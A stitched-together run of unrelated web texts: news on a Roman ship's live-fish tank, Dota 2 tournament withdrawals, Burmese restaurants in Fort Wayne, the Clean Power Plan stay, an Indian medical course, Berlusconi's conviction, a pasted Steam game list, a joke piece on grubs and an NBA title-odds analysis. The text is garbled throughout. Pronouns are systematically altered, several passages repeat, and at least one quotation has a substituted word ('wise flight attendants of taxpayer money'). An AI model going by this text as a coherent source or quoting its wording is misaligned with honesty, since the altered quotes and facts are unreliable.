They estimate an aquarium behind the mast of the ship could have measured about 11.4 feet by 6.5 feet by 3.3 feet ( 3.5 m by 2 m by 1 m ) for a capacity of approximately 250 cubic feet ( 7 cubic meters ) . For comparison , an average bathtub has a volume of about 7 cubic feet . If properly maintained , it could help keep at least 440 pounds ( 200 kg ) of live fish such as sea bass or sea bream , they noted .
`` This simple apparatus implies that , as attested by some ancient authors , the trade of live fish in antiquity was possible , '' Beltrame said .
Intriguingly , the researchers added that the Istria coast , which is only a few hours by boat from Grado , was known for numerous vivaria — enclosures for keeping live animals . Perhaps ships capable of transporting live fish brought such cargo to large markets , the researchers speculated .
Beltrame noted the existing archaeological evidence for their idea was poor . They now plan to reconstruct the apparatus to test how well it might have worked .
The scientists detailed their findings online March 11 in the International Journal of Nautical Archaeology .
IN PICTURES : World 's 20 weirdest fish
Follow LiveScience for the latest in science news and discoveries on Twitter @ livescience and on Facebook .
ADVERTISING :
Last season 's champions have decided to make a u-turn and give Nanyang a miss . Credit : ClickStorm Last season 's champions have decided to make a u-turn and give Nanyang a miss . Credit : ClickStorm
Sorry we wo n't be able to attend nanyang , I was looking forward to the tournament and China . Hopefully more chances to visit will come soon — Ludwig Wahlberg ( @ zai_2002 ) July 2 , 2016
I would like to thank the organizers for direct inviting us to Nanyang Championship . While we are very excited to go to the tournament , I am sad to announce that we will be unable to compete in it due to unavoidable visa issues ! I would like to thank the organizers for direct inviting us to Nanyang Championship . While we are very excited to go to the tournament , I am sad to announce that we will be unable to compete in it due to unavoidable visa issues !
Due to some ongoing issues with the event , our team has unfortunately had to withdraw from the upcoming Nanyang Championships tournament . — Team Secret ( @ teamsecret ) July 3 , 2016
Poor timing : Nanyang Championships suffer heavy lossesThe first Nanyang Championships were held in Singapore , but for Season 2 the organisers decided to hold them closer to home in Shanghai , China from the 6th-10th July . The event starts in just 3 days but over the course of the last 24 hours , three of the directly invited teams have announced their withdrawal ; EG , Secret and Fnatic.Evil Geniuses encountered problems obtaining a visa forSumail ' SumaiL ' Syed Hassan due to not having enough time to complete the process which takes longer as SumaiL holds a Pakistani passport.Meanwhile , according to GosuGamers Fnatic 's decision to withdraw is to do with `` unavoidable visa issues '' . Fnatic would have had to travel to China , before heading all the way to America for the Summit ( 13th-17th July ) , and then trekking to the LAN stage of the second Starladder i-League Invitational.This would have resulted in a long period of travel only a few weeks before The International kicks off in late July . According to Fnatic managementDjardel ' DJ ' Mampusti * could not obtain a Chinese visa . However , the withdrawal will provide the team with some much-needed rest after a stressful SEA qualifier for TI as well as ESL One Frankfurt.Fnatic 's announcement on Gosugamers came with this quote from Eric Kohr , their manager : Secret drop out due to `` ongoing issues '' with the eventEarly this morning there was further bad news as the defending champions Team Secret announced they too were dropping out of the tournament . This came as a suprise to many , as there will be few more opportunities to solidify as a team outside of the bootcamp and many were disappointed not to see their favourite players attending . Talking on Twitter the team said there were `` ongoing issues '' with the tournament . The full tweet can be found below , and no replacement has been announced as of yet.What is the Nanyang Championships ? The Nanyang Championship is a tournament put together by KeyTV , who announced back in May the first invite went to the then struggling Team Secret . Many argued the reigning champions were undeserving due to recent poor performance and many noted the lack of an invite for Team Liquid and their exclusion from the qualifiers , assuming they opted to take time off ahead of TI.Invites also went to Fnatic , EG and Newbee , whilst Planet Odd * and WarriorsGaming.Unity all came through their respective regions ' qualifiers . As of writing it boasts a $ 100,000 first prize +12 % of ingame ticket sale profit , whilst the prizepool stands at $ 200,000 ( not including bonuses from DotaTV ticket sales ) .The Participating teams are as follows : LGD-Gaming ( Fnatic replacement ) * We previously wrote that MidOne could not obtain a visa , that information proved incorrect and has been amended .
All photos by Nick Gomer .
All photos by Nick Gomer .
This is the second in a series of articles featuring immigrant- and refugee-owned restaurants in enclaves located outside of major US cities .
More than 6,000 residents of Fort Wayne , Indiana were born in Burma . That simple-sounding statistic , however , requires explanation . Burma itself ( though officially renamed Myanmar by the military government in 1989 , everyone I spoke with in Fort Wayne calls it Burma ) is sliced into about a dozen separate skirmishes . The civil war , as many still call it , has been ongoing since 1948 , just months after the country won independence from the British .
In Fort Wayne , the Burmese community is sliced into about a dozen groceries . There are markets for ethnic groups : Mon , Chin , Karen , Bamar , etc . There are Muslim groceries for the most prevalent recent group of Burmese refugees . There are Thai groceries for the Burmese refugees who spent a decade or longer in camps in northern Thailand . Every week , Lin Lin Market sells hundreds of Burmese samosas—smaller and lighter on the turmeric than Indian samosas . At Irrawady Halal , Roby Zum , a Muslim of Burmese descent who was born in a refugee camp in Thailand , buys their meat and fish . At the Mon Market , a woman hauls a large durian to the counter . Another store , Little Burma , is well-lit and artfully laid out , like a boutique wine shop . Distributors from Chicago drive trucks to Fort Wayne once a week to restock the thriving groceries .
Aside from some gang fighting between Muslim and Christian Burmese students at Southside High School , the Fort Wayne Burmese community is without violent conflict , but the groups are fragmented along a number of lines .
Outside Mon Asian Grocery in Fort Wayne .
Over the past decade , more refugees have come to the United States from Burma than any other country . For many years , Fort Wayne was the most common resettlement area . ( When I landed at the airport in Yangon , the Burma 's largest city , for the first time , my cabbie told me he 'd been to America once . `` New York ? '' I asked . `` Fort Wayne , '' they said . )
Lately , restaurant competition is picking up . A successful Mon grocery is opening an adjacent restaurant as soon as they can get up to code . One afternoon in late January , the owner and soon-to-be-cook was aggravated , trying to figure out how to purchase an industrial hood . Them restaurant will be called Never Not Taste , they said , serving hot and sour Mon dishes and Burmese classics like the fish paste-based mohinga .
In May of 2016 , just a month after Burma officially became a democracy , Sar Paw opened Nawarat , which is the only restaurant in the city serving halal meat .
Unlike Burma , which is predominantly Buddhist , Fort Wayne 's Burmese population breaks down into neatly even thirds — 2,000 Christians , 2,000 Muslims , and 2,000 Buddhists , according to Lutheran Pastor James Keller , who is the primary Burmese refugee and immigrant advocate in Fort Wayne .
Bitter melon , turmeric , mung beans , and other Burmese ingredients .
Pastor James Keller ( left ) , a Burmese refugee and immigrant advocate in Fort Wayne .
If the Fort Wayne community has a chance at commingling , Sar Paw might be its best bet . Born in a refugee camp in Thailand , their mother is a Christian Karen from Burma , their father is a Thai Buddhist , and Paw themselves converted to Islam . Despite the differing worldviews , Narawat remains a family-run restaurant . Their parents owned a restaurant in a refugee camp . Their grandfathers owned restaurants back in Burma . They and their Fort Wayne relatives saved for years , working at the Tyson chicken plants that opened around Fort Wayne specifically because of the influx of the reliable Burmese labor . Burmese of all different faiths line up out of Narawat 's door for the naan , puri , and paratha .
Narawat is set way back in a half-empty strip mall less than a mile from a sprawling single-story housing project that is occupied almost entirely by Burmese Muslims . Every Thursday , Keller sits in one of the apartments and helps the refugees and immigrants overcome one of their biggest obstacles : paperwork . Green cards , citizenship , speeding tickets , government housing .
In late January , the Burmese Muslims became spooked by the rise of Trump and rushed to update their statuses . Keller helped a Rohingya couple get their green cards . They had walked the nearly 2,000 miles to Malaysia . The Muslim sect , largely located in Burma 's Rakhine State , have been oppressed by Buddhist nationalists and their plight has made international headlines . In refugee camps they bought identity cards , which they 'd been denied in their own country , from Karens who were looking to stay . Only recently have there been enough Rohingya in Fort Wayne for the group to begin proudly identifying as such , Keller said .
Keller , who learned Burmese in order to help the refugees , has more Burmese friends than American-born friends . Their congregation is majority Burmese . They cook spicy Burmese dishes in their own kitchen—something they learned from hanging around in the homes of their friends . Their wife makes chicken wings with a Burmese sauce , and their Burmese friends always ask for the recipe .
The city 's oldest Burmese restaurant , Mahnin , is located in a short , white building that curves like an old diner . Across the street The Rialto , a theater built in 1924 , is dormant . The city has experienced several downturns and revitalizations . The most recent downturn came with deindustrialization in the 1980s . Downtown , plots have been cleared of empty buildings to make space for parks and new development .
On a Thursday night , Ma Hnin was closing their restaurant , which is extremely well-regarded across all communities , and talking with Tint Maung Maung Htway , the second Burmese refugee to ever come to Fort Wayne .
The two fled Burma at the same time—just after the 1988 student uprising—but came to the United States in different waves . Htway was an active dissident during the uprising , forming a student political party . They risked death , speaking with a BBC reporter about the torture and sexual assault committed by the military . At Mahnin they spoke in a soft , high-pitched voice , looking like the Soprano 's Big Pussy Bonpensiero , hunched over the table in a black and white tracksuit . When the military cracked down on their political party , they fled Yangon to Thailand . They heard from their friend that churches in Fort Wayne were sponsoring refugees and soon they were on the ground .
Tint Maung Maung Htway ( left ) and Ma Hnin at Mahnin restaurant .
Some of the menu items at Mahnin .
`` Dissidents have congregated in Fort Wayne and when they do , they come here , '' they said of the restaurant .
They launched into a tirade about Daw Aung San Suu Kyi , the de facto leader of the country 's new democracy who has achieved cult-like status within Myanmar , calling them `` a pretty puppet of the military '' and `` another corrupt liberal . ''
About 12 well-connected , ethnically Bamar , male college students with a decent command of the English language , like Htway , were the first Burmese to be resettled in Fort Wayne . Different Fort Wayne churches—Presbyterian , Methodist , Lutheran , Episcopalian , Baptist , and Catholic—sponsored that round . Their education allowed them to integrate quickly . Word spread back to Burma that Fort Wayne was the place to be in America and hundreds of refugees followed .
Ma Hnin , which translates to `` Mrs . Snow , '' was loosely involved with the protests but took advantage of the chaos of the uprising to leave Mawlamyine , the largest city in Mon State , and relocate to Thailand . In Bangkok , they took work in a restaurant and learned to cook . In 1998 , they were resettled in Fort Wayne .
`` My mom had just passed away , '' they said through Htway 's translation . `` I was in an alien land . I thought life would be better but it was a cold and strange place , so I cried , cried , cried . ''
At that time , there were no Burmese markets , but Ma Hnin started cooking out of their home . Burmese neighbors , usually single guys , would show up with ingredients and she 'd cook for them . They built a name for themselves in the community . When their husband 's company shut down , the $ 700 per month in government assistance was not enough to support their three kids . They did not want to open a restaurant , but in 2009 , they did . The menu is about half Burmese , which they taught themselves retroactively from taste memory of their childhood , and half Thai . Dishes like the buttery gang masaman and the beautiful orange-colored Burmese coconut noodle soup with lentil fritters made the place an immediate success .
They are proud of the restaurant 's success and their resilience , but their life is n't easy .
`` One thing that makes me sad is that I 'm cuffed with the chain every day just to make ends meet . Even now , '' they said . `` That 's the sad part of me . I ca n't visit other states or visit Canada , see some of my friends in Australia . A lot of friends live there . I ca n't make it there because I have to survive here . So the sad part of it is the day-to-day . ''
This week , the U.S. Supreme Court issued a stay of EPA 's Clean Power Plan until the pending litigation against the rule is resolved , including any appeal to the high court . This means the rule will be in legal limbo until the Supreme Court rules on the merits of the case . In response to the Court 's action , AEE 's Malcolm Woolf said that while we are disappointed by the decision , which could have a “ disruptive and chilling ” effect on modernizing our electricity system , “ we are witnessing the inevitable rise of better technology designed to meet the energy needs of the 21st century , and we feel confident that , upon full review , the rule will be upheld on the merits. ” But what does this mean for our industry , nationally and in the states ?
So , here 's what happened .
In a 5-4 ruling , the Supreme Court overturned the decision of the Court of Appeals for the D.C . Circuit to deny petitioners a stay of the Clean Power Plan ( CPP ) . This was an unusual action by the high court . Stays of governmental action while litigation is pending are rare , especially as the Supreme Court generally gives wide deference to the D.C . Circuit on matters of administrative law . However , the high profile of the case makes it somewhat less surprising that the Supreme Court would seek to preserve the status quo ( i.e . forestall implementation of the new rules ) pending a full hearing and decision on the merits of the plaintiffs ' Constitutional and statutory claims .
The case now moves to consideration of the merits . The case before the appeals court was already set on an expedited schedule , with briefs due in April and oral arguments scheduled for June 2 . Whatever the decision in the D.C . Circuit , one of the sides will file an appeal . Assuming the Supreme Court takes up the case , a decision would not be expected until 2017 , and could even be 2018 .
Implications for federal and state actions
Since the stay decision essentially pauses implementation of the CPP until the litigation concludes , the practical implications are complex and uncertain . That is especially true given the lengthy implementation timetable for the CPP , which calls for the voluntary crediting of the Clean Energy Incentive Program to begin in 2020 and mandatory compliance in 2022 .
At the federal level , while EPA can not enforce implementation of the regulation , the Agency may continue to work on aspects of the rule through the issuance of guidance materials , such as the one it drafted on demand side energy efficiency EM & V , and other mechanisms .
At the state level , some states have already taken the opportunity to put away their planning pens , but others will likely continue their efforts ( see map ) . Nine states – California , Colorado , Minnesota , New York , Oregon , Pennsylvania , Virginia , Washington , and Wyoming – have already announced intentions to continue planning , and more are likely to follow in the coming days and weeks . Even states that are suing EPA are still aware of the need to continue planning . The Arkansas Department of Environmental Quality and Public Service Commission issued a joint statement saying they were pleased with the decision , but that they would “ strive to balance our obligation to be wise flight attendants of taxpayer money with our obligation to be fully prepared should the Supreme Court ultimately uphold the plan . ”
While the Supreme Court is years away from a final decision on the CPP , it has already confirmed EPA 's authority to regulate carbon emissions . So even if the Supreme Court rules against EPA in this case , the electricity sector will eventually have to comply with some form of carbon limit—perhaps one that is less flexible than the CPP .
Implications for the advanced energy industry
Despite the short-term uncertainty around the CPP caused by the stay , prospects for the advanced energy industry remain bright . With the final rule pushing the start of compliance back to 2022 , CPP is a market driver for the long term . In the meantime – as the rule gets litigated on the merits – there are several trends driving industry growth :
Extension of the ITC and PTC , with phase-down of the credits , through 2022 provides a longer period of market certainty than the solar and wind industries have had for some time . As a result , initial modeling estimates of renewable energy deployment over the next few years are large , with over 15 GW/year of deployment predicted for much of the next five years . Congress is also considering expanding this tax credit for technologies such as CHP and fuel cells .
Natural gas , solar , and wind power are dominating new capacity installations , with low-priced natural gas and record-low PPA prices for renewable energy , and accounting for a growing share of generation – trends that are likely to continue .
Energy efficiency , demand response ( aided by a favorable Supreme Court decision preserving DR 's role in wholesale electricity markets ) , and other demand management technologies continue to grow due to cost-competitiveness .
Utilities are continuing to plan and invest in advanced energy technology , regardless of CPP litigation , with the awareness that customers and markets are pushing for more investment in cleaner technologies .
Energy bill slows to a halt in the Senate
While the Supreme Court 's decision grabbed most headlines this week , the Senate pulled the comprehensive energy bill from the floor for the foreseeable future . It was the ongoing water crisis in Flint , Michigan , rather than anything having to do with energy , that knocked the bill off track . Democrats , led by Sen. Debbie Stabenow ( D-MI ) and Sen. Gary Peters ( D-MI ) , pushed for spending to address the crisis while Republicans insisted on a spending offset if the amendment were to be adopted . The bill seemed to gain some traction earlier this week with a proposal from Senate Environment and Public Works Chairman James Inhofe ( R-OK ) that the Congressional Budget Office says will not add to the deficit . Nonetheless , Senate Majority Leader Mitch McConnell ( R-KY ) decided to focus floor time on other issues this week . Stabenow believes that the energy bill can pass if a compromise to address the Flint crisis is reached , but as of right now , that looks unlikely .
Stay up-to-date on all the latest news from the advanced energy industry , the Supreme Court , Congress , and beyond ! Click below to sign up for AEE 's weekly newsletter .
NEW DELHI : The Medical Council of India ( MCI ) has finally cleared introduction of the three-and-a-half-year long medical course . Calling it BSc in Community Health , it will be open to anybody after class 12.Speaking to TOI , MCI board chairperson Dr K K Talwar said this special cadre of health workers will be trained mainly in district hospitals , be placed in sub-centres or primary health centres and will be taught “ some module of clinical work ” .This means this cadre can actually diagnose and treat basic medical cases , get involved in immunization programmes and administer extended first aid. “ We intend to introduce the course from April next year . This cadre will also refer patients according to their condition to other centres . We have also prepared the syllabus of the course . The ministry will now take the final call , ” Dr Talwar said.Health secretary P K Pradhan has called a high level meeting on Tuesday to finalize the proposal.The Planning Commission 's high level expert group has strongly backed the all new health cadre and said that as a career progression incentive , they should be promoted to the level of public health officers after 10 years of service.The health ministry has been strongly pushing for the introduction of this cadre , in order to tackle the menace of doctors unwilling to serve in rural areas . Only 26 % of doctors in India reside in rural areas , serving 72 % of India 's population . The urban density of doctors is nearly four times that of rural areas , and that of nurses is three times higher.Things have taken a turn for the worse in the past few decades with the disappearance of certain cadres — village health guides and traditional birth attendants , first instituted in 1986 . Experts said the selection of students would be based on merit in the Class 12 examination with physics , chemistry and biology as subjects.Health minister Ghulam Nabi Azad had earlier said that they wanted an MCI stamp on the degree so that it was universally recognized . “ The syllabus of the course is also ready and is need-based . If MCI endorses it , students will get the confidence that the degree has a standing , ” they had said.The panel , however , was clear that the course was not a mini-MBBS but rather a unique training programme aimed at the basic health care needs of its target population .
One-year jail term to be served through community service or house arrest , with ban on public office referred to another court
Silvio Berlusconi , Italy 's longest-serving postwar prime minister , has been handed their first definitive criminal conviction in more than 20 years of legal battles but the country 's supreme court spared them the immediate prospect of being barred from public office .
In a long-anticipated ruling , the five judges of the court of cassation emerged from more than seven hours of deliberations to issue a verdict confirming a four-year jail term for the leader of the Freedom People party ( PdL ) , a vital part of Italy 's coalition government .
That sentence had already been cut to one year according to a 2006 amnesty , and , owing to Berlusconi 's age – they will be 77 in September – it will be served through house arrest or community service .
It was enough , however , to place great pressure on the fragile government and prompt fury among their supporters . `` This country was famous for being the cradle of the law . Today it has become its tomb , '' said Luca d'Alessandro , a PdL MP and secretary of the lower house of parliament 's justice commission . `` Honour and solidarity with Silvio Berlusconi , who is certainly more innocent and clean than those who unjustly convicted him . ''
The editor of a right-wing newspaper , Il Foglio , labelled the sentence `` vile '' .
The part of the sentence that Berlusconi was most worried about – a five-year ban on public office – will not be enforced in the near future after the judges ordered another court to determine its length . Prosecutors during this final appeal hearing had argued that the ban should be cut to three years . Had it been upheld , it would have stymied Berlusconi 's immediate political ambitions . As it is , they will be able to continue as a senator in Italy 's upper house of parliament and leader of their party .
The verdict is still likely to cause trouble for the ruling coalition of Enrico Letta , which since late April has united their centre-left Democratic Party with Berlusconi 's PdL in an awkward and unhappy marriage .
The prime minister said this week they were not expecting an `` earthquake '' from the verdict , and Berlusconi themselves – who has historically railed against leftwing magistrates plotting against them – has seemed unusually reluctant to provoke their party members into open rebellion . That has not stopped many of them threatening it .
The PdL leader could yet decide to pull the plug on a government they feel is not serving their interests as they had hoped . However , they may realise that plunging the eurozone 's third-largest economy into fresh turmoil would not win them any popularity with weary voters or the head of state , president Giorgio Napolitano .
Observers say pressure on the government could equally come from the other side of the coalition , where many in the PD who were squeamish about joining forces with their political bête noire may draw the line at continuing in an coalition with a convicted criminal . Immediately after the verdict Nichi Vendola , head of the opposition Left Ecology Freedom party ( SEL ) , said it was `` not possible '' for the coalition to continue .
`` Faced with this conviction I think it is necessary to bear the consequences : it is not possible to imagine that the PD can remain an ally of Silvio Berlusconi 's party . It is not possible to imagine that Silvio Berlusconi can remain at the centre of the political scene . I think that big changes are necessary to give a moral response to the country . ''
The verdict convicted Berlusconi of the fraudulent purchase of broadcasting rights by their Mediaset empire and the evasion of about €7m ( £6m ) in taxes in 2002 and 2003 – when they were prime minister . Their defence lawyers had argued that they should be acquitted because their political commitments meant they were not actively involved in the company .
Their defence lawyers had argued that they should be acquitted because their political commitments meant they were not actively involved in the company . Led by Franco Coppi , a lawyer specialised in cassation appeals who successfully defended former prime minister Giulio Andreotti against charges of mafia ties , they also argued that the crime of which they were accused was not technically a penal offence .
But prosecutors , supporting the verdicts of two lower courts which convicted Berlusconi in October last year and again in May , said Berlusconi 's control over Mediaset was `` ongoing '' at the time , and they were `` the mind '' behind the system of tax fraud .
Berlusconi was not present at the court but spent the day at their Rome residence , Palazzo Grazioli , reportedly with two of their children , their closest advisers , lawyers and girlfriend Francesca Pascale .
Ever since they entered politics in 1994 , Berlusconi has been fighting an almost relentless wave of court cases , but until Thursday night not a single one had ended in their definitive conviction . Several lower grade convictions were either thrown out , overturned on appeal or timed out owing to their statute of limitations .
It is not only with the court decision on their public office ban that their legal battles will continue . In June they were given a lower-grade conviction and sentenced to seven years in jail and a lifetime ban on public office for paying for sex with an underage prostitute and abusing their office to cover it up . They are appealing against the verdict – and , even if that appeal fails , they will be allowed a second .
They are also appealing against a conviction for publishing the transcript of a leaked wiretap in their family newspaper , Il Giornale , for which they were ordered to serve a one-year jail sentence . In October , meanwhile , a a court is due to rule on whether they should be tried for allegedly bribing a senator to switch political sides . They deny the allegations .
Untitled a guest Dec 2nd , 2014 1,382 Never a guest1,382Never
Not a member of Pastebin yet ? Sign Up , it unlocks many cool features !
rawdownloadcloneembedreportprint text 3.53 KB Aerena Age of Empires® III : Complete Collection Alan Wake Alien Breed 2 : Assault Alien Breed 3 : Descent Alien Breed : Impact Always Sometimes Monsters Assassin 's Creed Audiosurf Batman : Arkham Asylum GOTY Edition Batman : Arkham City GOTY Battlefield : Bad Company 2 Beat Hazard BioShock BioShock Infinite Blackguards Borderlands Call of Duty 4 : Modern Warfare Call of Duty : Modern Warfare 2 Call of Duty : Modern Warfare 2 - Multiplayer Call of Duty : World at War Castle Crashers Chains Chivalry : Medieval Warfare Cities in Motion 2 Company of Heroes 2 Counter-Strike : Global Offensive Counter-Strike : Source Crazy Taxi Crusader Kings II Darkest Hour : A Hearts of Iron Game Deadlight Dead Space 2 Deus Ex : Game of the Year Edition Deus Ex : Human Revolution Dota 2 Dragon Age : Origins Dungeon of Elements Empire : Total War Euro Truck Simulator 2 F.E.A.R . F.E.A.R . 2 : Project Origin F.E.A.R . 3 F.E.A.R . : Extraction Point F.E.A.R . : Perseus Mandate Fable - The Lost Chapters Fallout 3 - Game of the Year Edition Fallout : New Vegas Famaze 1m Far Cry 2 Far Cry® 3 Frozen Hearth Full Mojo Rampage Galactic Civilizations® II : Ultimate Edition Garry 's Mod Grand Theft Auto Grand Theft Auto 2 Grand Theft Auto : Episodes from Liberty City Grand Theft Auto : San Andreas Grand Theft Auto : San Andreas Grand Theft Auto : Vice City Grand Theft Auto : Vice City Grand Theft Auto III Grand Theft Auto III Grand Theft Auto IV GRID GRID 2 Guardians of Middle-earth Half-Life 2 Half-Life 2 : Episode One Half-Life 2 : Episode Two Half-Life 2 : Lost Coast Half Minute Hero : Super Mega Neo Climax Ultimate Boy Hitman : Absolution Hitman : Sniper Challenge Insurgency Intake Just Cause 2 Just Cause 2 : Multiplayer Mod KickBeat Steam Edition Killing Floor Mod : Defence Alliance 2 Kingdoms of Amalur : Reckoning™ Left 4 Dead 2 Legend of Grimrock Magicka March of the Eagles Mark of the Ninja Medieval II : Total War Mirror 's Edge Mortal Kombat Kollection Napoleon : Total War NiGHTS into Dreams ... Nosgoth Orcs Must Die ! 2 ORION : Prelude Papers , Please Path of Exile PAYDAY : The Heist Pinball FX2 PixelJunk Eden Portal Portal 2 Prince of Persia : The Sands of Time Puzzler World 2 Rome : Total War Rome : Total War - Alexander Rust Saints Row : The Third Saints Row IV Scribblenauts Unlimited SEGA Bass Fishing Sid Meier 's Civilization V Sonic & All-Stars Racing Transformed Sonic Adventure DX Sonic Generations Space Channel 5 : Part 2 Space Hack Star Wars - Battlefront II Star Wars : Knights of the Old Republic Superfrog HD Sword of the Stars II : Enhanced Edition Takedown : Red Sabre Team Fortress 2 Teleglitch : Die More Edition Terraria Tesla Effect The Dream Machine The Dream Machine : Chapter 3 The Dream Machine : Chapter 4 The Elder Scrolls III : Morrowind The Elder Scrolls IV : Oblivion The Elder Scrolls V : Skyrim The Incredible Adventures of Van Helsing THE KING OF FIGHTERS XIII STEAM EDITION The Lord of the Rings : War in the North The Sims ( TM ) 3 The Witcher 2 : Assassins of Kings Enhanced Edition Tom Clancy 's Splinter Cell : Conviction Torchlight II Trine 2 Viking : Battle for Asgard VVVVVV Warlock - Master of the Arcane War of the Roses Worms Worms Armageddon Worms Blast Worms Crazy Golf Worms Pinball Worms Reloaded Worms Ultimate Mayhem XCOM : Enemy Unknown
RAW Paste Data
Aerena Age of Empires® III : Complete Collection Alan Wake Alien Breed 2 : Assault Alien Breed 3 : Descent Alien Breed : Impact Always Sometimes Monsters Assassin 's Creed Audiosurf Batman : Arkham Asylum GOTY Edition Batman : Arkham City GOTY Battlefield : Bad Company 2 Beat Hazard BioShock BioShock Infinite Blackguards Borderlands Call of Duty 4 : Modern Warfare Call of Duty : Modern Warfare 2 Call of Duty : Modern Warfare 2 - Multiplayer Call of Duty : World at War Castle Crashers Chains Chivalry : Medieval Warfare Cities in Motion 2 Company of Heroes 2 Counter-Strike : Global Offensive Counter-Strike : Source Crazy Taxi Crusader Kings II Darkest Hour : A Hearts of Iron Game Deadlight Dead Space 2 Deus Ex : Game of the Year Edition Deus Ex : Human Revolution Dota 2 Dragon Age : Origins Dungeon of Elements Empire : Total War Euro Truck Simulator 2 F.E.A.R . F.E.A.R . 2 : Project Origin F.E.A.R . 3 F.E.A.R . : Extraction Point F.E.A.R . : Perseus Mandate Fable - The Lost Chapters Fallout 3 - Game of the Year Edition Fallout : New Vegas Famaze 1m Far Cry 2 Far Cry® 3 Frozen Hearth Full Mojo Rampage Galactic Civilizations® II : Ultimate Edition Garry 's Mod Grand Theft Auto Grand Theft Auto 2 Grand Theft Auto : Episodes from Liberty City Grand Theft Auto : San Andreas Grand Theft Auto : San Andreas Grand Theft Auto : Vice City Grand Theft Auto : Vice City Grand Theft Auto III Grand Theft Auto III Grand Theft Auto IV GRID GRID 2 Guardians of Middle-earth Half-Life 2 Half-Life 2 : Episode One Half-Life 2 : Episode Two Half-Life 2 : Lost Coast Half Minute Hero : Super Mega Neo Climax Ultimate Boy Hitman : Absolution Hitman : Sniper Challenge Insurgency Intake Just Cause 2 Just Cause 2 : Multiplayer Mod KickBeat Steam Edition Killing Floor Mod : Defence Alliance 2 Kingdoms of Amalur : Reckoning™ Left 4 Dead 2 Legend of Grimrock Magicka March of the Eagles Mark of the Ninja Medieval II : Total War Mirror 's Edge Mortal Kombat Kollection Napoleon : Total War NiGHTS into Dreams ... Nosgoth Orcs Must Die ! 2 ORION : Prelude Papers , Please Path of Exile PAYDAY : The Heist Pinball FX2 PixelJunk Eden Portal Portal 2 Prince of Persia : The Sands of Time Puzzler World 2 Rome : Total War Rome : Total War - Alexander Rust Saints Row : The Third Saints Row IV Scribblenauts Unlimited SEGA Bass Fishing Sid Meier 's Civilization V Sonic & All-Stars Racing Transformed Sonic Adventure DX Sonic Generations Space Channel 5 : Part 2 Space Hack Star Wars - Battlefront II Star Wars : Knights of the Old Republic Superfrog HD Sword of the Stars II : Enhanced Edition Takedown : Red Sabre Team Fortress 2 Teleglitch : Die More Edition Terraria Tesla Effect The Dream Machine The Dream Machine : Chapter 3 The Dream Machine : Chapter 4 The Elder Scrolls III : Morrowind The Elder Scrolls IV : Oblivion The Elder Scrolls V : Skyrim The Incredible Adventures of Van Helsing THE KING OF FIGHTERS XIII STEAM EDITION The Lord of the Rings : War in the North The Sims ( TM ) 3 The Witcher 2 : Assassins of Kings Enhanced Edition Tom Clancy 's Splinter Cell : Conviction Torchlight II Trine 2 Viking : Battle for Asgard VVVVVV Warlock - Master of the Arcane War of the Roses Worms Worms Armageddon Worms Blast Worms Crazy Golf Worms Pinball Worms Reloaded Worms Ultimate Mayhem XCOM : Enemy Unknown
Bugs may have fangs , stingers and howling star-spawn faces , but at least humans have the size advantage , right ?
5 Grubs Grubs
This hulking dinosaur maggot is the grub of the Hercules beetle , which can be found squirming in and around piles of rotting wood down in Central and South America . It can grow up to 4-and-a-half inches long , leaving it sufficient room in its abdomen to digest your nightmares .
verypurpleperson
They then crawl into your ear and regurgitate them back into your mind as you sleep .
Even in its larval state , Hercules beetles wield sizable jaws and can remain in this form for up to two years , making them a perfect starter pet for toddlers , if your parenting skills are the living personification of a Vincent Price character . They 're so reclusive that they usually require an ultraviolet light to even locate , should you be the type of person who requires this piece of information .
verypurpleperson
In fairness , that 'd be preferable to not knowing where this guy is .
On Thursday , after LeBron James and the Miami Heat won their second consecutive N.B.A . championship , I noted on Twitter that James was on the same pace as the Chicago Bulls great Michael Jordan . Both James and Jordan won their first championship at 27 and their second at 28 , I wrote . Jordan went on to win four more N.B.A . titles , for a total of six .
Photo
My statement depended on a technicality , I later discovered : Jordan 's biological age was 28 when they won their first championship , in 1991 , and 29 when they won their second , in 1992 . However , basketball statisticians generally define a player 's age differently : by how old they were as of Feb. 1 of an N.B.A . season , the rough midpoint of the basketball calendar . Jordan 's birthday is Feb. 17 .
Those semantics aside , it is worth considering just how likely James might be to match or exceed Jordan 's six titles . ( From this point on , we 'll use basketball statisticians ' definition of age . )
Players like Jordan and James are so rare that it can be risky to compare them with anyone . Still , one reasonably useful benchmark is to evaluate players who , like James and Jordan , had won at least one Most Valuable Player award and at least one N.B.A . title as of their age-28 season , meaning that they had achieved the pinnacle of both individual and team success .
By my count , there were 13 such players before James . On average , they won about two additional championships ( more precisely , an average of 1.9 ) after their age-28 season . So a reasonable over-under line for James might be two more N.B.A . titles , or four total .
Photo
It is tough to say exactly what James 's odds of catching Jordan might be , because the average conceals a wide range of outcomes among the individual players . Four of the players on the list — Magic Johnson , Moses Malone , Bob Pettit and Dave Cowens — never won another championship after their age-28 season . But four others — Jordan , Bill Russell , Bob Cousy and Kareem Abdul-Jabbar — won at least four more titles .
James needs four more championships to catch Jordan , so one estimate of their odds might be 4 chances out of 13 , or about 30 percent . But some of the favorable precedents , like Russell , came in an era when teams had far more ability to retain their players . Among the players on the list who played their age-28 season during the salary-cap era ( since 1984-85 ) , only Jordan won four or more titles .
Photo
It seems safe to say that you would not want to bet on James at even money . There are just too many things that can go wrong with a player 's career as they age : injury or illness , early retirement , bad teammates or bad luck .
Even this year 's Heat began the season with only about a 30 percent chance of winning the title , according to the Las Vegas odds . That percentage roughly matches the historical likelihood of an N.B.A . team 's repeating as champion , which is 33 percent .
So James 's chances of winning a third title next season in Miami are probably about 1 in 3 . After that , their chances begin to decline . For one thing , it is less certain that James will be surrounded by strong teammates . ( James has the right to opt out of their contract after next season , and even if they stay in Miami , teammates like Dwyane Wade are already seeing their skills atrophy . )
More important , players in team sports typically peak in skill in their mid- to late 20s , meaning that James 's game may begin to wane . The N.B.A . is a superstar 's league , and if James goes from being M.V.P.-caliber to mere All-Star within a few years , it will considerably hurt their odds of winning more titles .
I have estimated a player 's chances of winning an N.B.A . title based on their win shares , a statistic calculated by Basketball-Reference.com that measures overall value to a team . Since the introduction of the salary cap in 1984-85 , excluding the two regular seasons ( 1998-99 and 2011-12 ) that were shortened by labor disputes , the best player in the league in a given season has averaged about 18 win shares , which is a reasonably good match for James 's performance over the last several years . The model estimates that such a player has about a 20 percent or 25 percent chance of winning the championship in today 's N.B.A . environment .
Photo
What about the fifth-best player in the league — someone equivalent to the worst player on the All-N.B.A . team ? That player has averaged about 13 win shares , which translates to only about a 10 percent chance of winning the championship .
